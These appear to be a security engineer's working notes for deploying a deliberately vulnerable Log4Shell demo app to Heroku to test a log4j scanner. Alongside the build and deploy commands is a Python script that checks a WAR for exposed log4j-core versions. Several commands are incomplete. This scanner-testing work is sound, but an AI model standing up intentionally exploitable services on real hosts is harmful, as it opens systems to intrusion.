Deploying a sample vulnerable Log4j application in Heroku

Installation - nuke this maybe?

brew install java
brew tap AdoptOpenJDK/openjdk
brew install adoptopenjdk8
brew install adoptopenjdk11
brew install adoptopenjdk13

Put this at the end of your ~/.zshrc or ~/.bashrc, so you can easily switch between different versions of Java:

export JAVA_8_HOME=$(/usr/libexec/java_home -v1.8)
export JAVA_11_HOME=$(/usr/libexec/java_home -v11)

alias java8='export JAVA_HOME=$JAVA_8_HOME'
alias java11='export JAVA_HOME=$JAVA_11_HOME'

# default to Java 11
export JAVA_HOME=$JAVA_11_HOME

Heroku setup

  • Create an application in Heroku

  • Build a WAR
git clone
cd log4shell-vulnerable-app
./gradlew war

  • Other option: try extracting the JAR file from the docker image
# From Christophe's thing
docker build . -t vulnerable-app
docker run 
docker create -ti --name dummy IMAGE_NAME bash

docker pull
# No need to replace dummy; IMAGE_NAME is the image you pulled
docker create -ti --name dummy IMAGE_NAME bash
docker cp dummy:/app/spring-boot-application.jar ./

docker run --name vulnerable-app -v 

  • Deploy with Heroku
heroku login
heroku plugins:install java
# heroku war:deploy ./target/log4shell-1.0-SNAPSHOT.war --app log4shell-example

The log4j-scanner doesn't mine for parameters, so let's use an app that doesn't require that.

git clone
cd log4shell-vulnerable-app
jar -cvf log4shell-vulnerable-app.war *
heroku war:deploy ./log4shell-vulnerable-app.war --app log4shell-example
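Before pushing a WAR like this, it is worth confirming which log4j-core build it actually bundles, since that is what the scanner is being tested against. The check below is an added example, not part of the original notes or the log4shell-vulnerable-app project; it assumes the standard WAR layout with jars under WEB-INF/lib and builds its own constructed sample WAR so it runs offline.

```python
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_JAR_RE = re.compile(r"WEB-INF/lib/log4j-core-(\d+(?:\.\d+)*)\.jar$")


def build_sample_war(version, with_jndi_lookup=True):
    """Constructed sample WAR with a stub log4j-core jar under WEB-INF/lib.
    The .class entry is a placeholder, not real bytecode."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as jar:
        jar.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                     "artifactId=log4j-core\nversion=%s\n" % version)
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as w:
        w.writestr("WEB-INF/web.xml", "<web-app/>")
        w.writestr("WEB-INF/lib/log4j-core-%s.jar" % version, core.getvalue())
    return war.getvalue()


def version_tuple(text):
    m = re.match(r"\d+(?:\.\d+)*", text)
    return tuple(int(p) for p in m.group(0).split(".")) if m else (0,)


def inspect_war(war_bytes):
    """One record per log4j-core jar bundled in the WAR."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for name in war.namelist():
            m = CORE_JAR_RE.search(name)
            if not m:
                continue
            version = m.group(1)  # from the file name; pom.properties wins if present
            with zipfile.ZipFile(io.BytesIO(war.read(name))) as jar:
                entries = set(jar.namelist())
                for entry in entries:
                    if entry.endswith("/log4j-core/pom.properties"):
                        pm = re.search(r"^version=(.+)$", jar.read(entry).decode(), re.M)
                        if pm:
                            version = pm.group(1).strip()
                has_jndi = JNDI_LOOKUP in entries
            # 2.16.0 disabled JNDI by default and removed message lookups; older builds
            # are exposed unless JndiLookup.class was stripped (the documented mitigation).
            # The 2.12.2 / 2.3.1 backports are flagged too, which is conservative, not exact.
            exposed = has_jndi and version_tuple(version) < (2, 16, 0)
            findings.append({"jar": name, "version": version,
                             "jndi_lookup_present": has_jndi, "exposed": exposed})
    return findings
```

Run `inspect_war(open("log4shell-vulnerable-app.war", "rb").read())` against the real WAR to see the bundled version and whether the JNDI lookup class is still present.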

To troubleshoot, look at the logs:

heroku logs --tail --app log4shell-example

Helpful links:

Kinnaird McQuade
Staff Security Engineer